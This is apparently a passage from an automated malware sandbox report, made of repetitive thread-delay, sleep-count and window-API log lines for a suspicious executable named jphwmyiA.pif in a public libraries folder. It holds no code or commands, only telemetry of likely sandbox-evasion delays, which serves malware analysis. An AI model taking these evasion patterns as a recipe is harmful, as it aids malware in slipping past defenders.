Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594225	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593980	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593862	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593731	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593559	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593444	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593322	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593187	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593058	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592945	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592835	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592666	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592531	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592412	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599228
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598997
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598875
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598753
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598625
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598516
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598391
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598281
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598171
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597952
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597843
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597734
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597624
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597514
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597379
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597123
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597015
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596906
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596797
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596687
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596578
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596468
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596358
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596140
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596031
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595922
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595812
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595703
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595593
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595484
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595374
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595265
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595156
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595042
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594922
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594812
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594703
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594594
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594484
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594372
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599874
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599750
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599640
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599530
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599422
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599312
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599202
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599092
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598957
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598701
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598593
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598484
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598375
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598265
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598156
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598046
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597936
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597828
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597718
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597608
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597390
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597280
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596952
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596843
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595968
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595858
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595750
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595640
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595531
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595422
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595312
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595202
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595093
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594984
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594873
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594542
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594437

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 1679	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 8118	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: foregroundWindowGot 1736	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 5247
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 4595
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: foregroundWindowGot 1766
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 4464
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 5386
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: foregroundWindowGot 1755

Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6392	Thread sleep count: 1679 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -599825s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -599663s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 2072	Thread sleep count: 8118 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -599538s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -599424s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -599204s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598981s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598606s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598486s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598368s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598246s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598133s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597905s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597686s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597358s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597139s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -597030s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596811s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596702s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596589s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596483s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596226s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -596074s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595952s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595733s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595405s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595289s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -595061s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594952s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594732s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594608s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594473s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594338s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594225s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593980s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593862s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593731s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593559s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593444s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593322s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593187s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -593058s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -592945s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -592835s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -592666s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -592531s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4676	Thread sleep time: -592412s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4396	Thread sleep count: 5247 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599890s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4396	Thread sleep count: 4595 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599228s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -599109s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598997s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598875s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598753s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598625s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598516s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598391s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598281s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598171s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -598062s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597952s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597843s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597734s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597624s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597514s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597379s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597123s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -597015s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596906s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596797s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596687s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596578s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596468s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596358s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596250s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596140s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -596031s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595922s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595812s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595703s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595593s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595484s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595374s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595265s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595156s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -595042s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -594922s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -594812s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -594703s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -594594s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -594484s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6324	Thread sleep time: -594372s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep count: 36 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 940	Thread sleep count: 4464 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599874s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 940	Thread sleep count: 5386 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599750s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599640s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599530s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599422s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599312s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599202s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -599092s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598957s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598701s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598593s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598484s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598375s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598265s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598156s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -598046s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597936s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597828s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597718s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597608s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597500s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597390s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597280s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597172s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -597062s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596952s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596843s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596734s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596625s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596515s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596406s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596297s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596187s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -596078s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595968s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595858s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595750s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595640s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595531s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595422s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595312s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595202s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -595093s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -594984s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 4500	Thread sleep time: -594873s >= -30000s
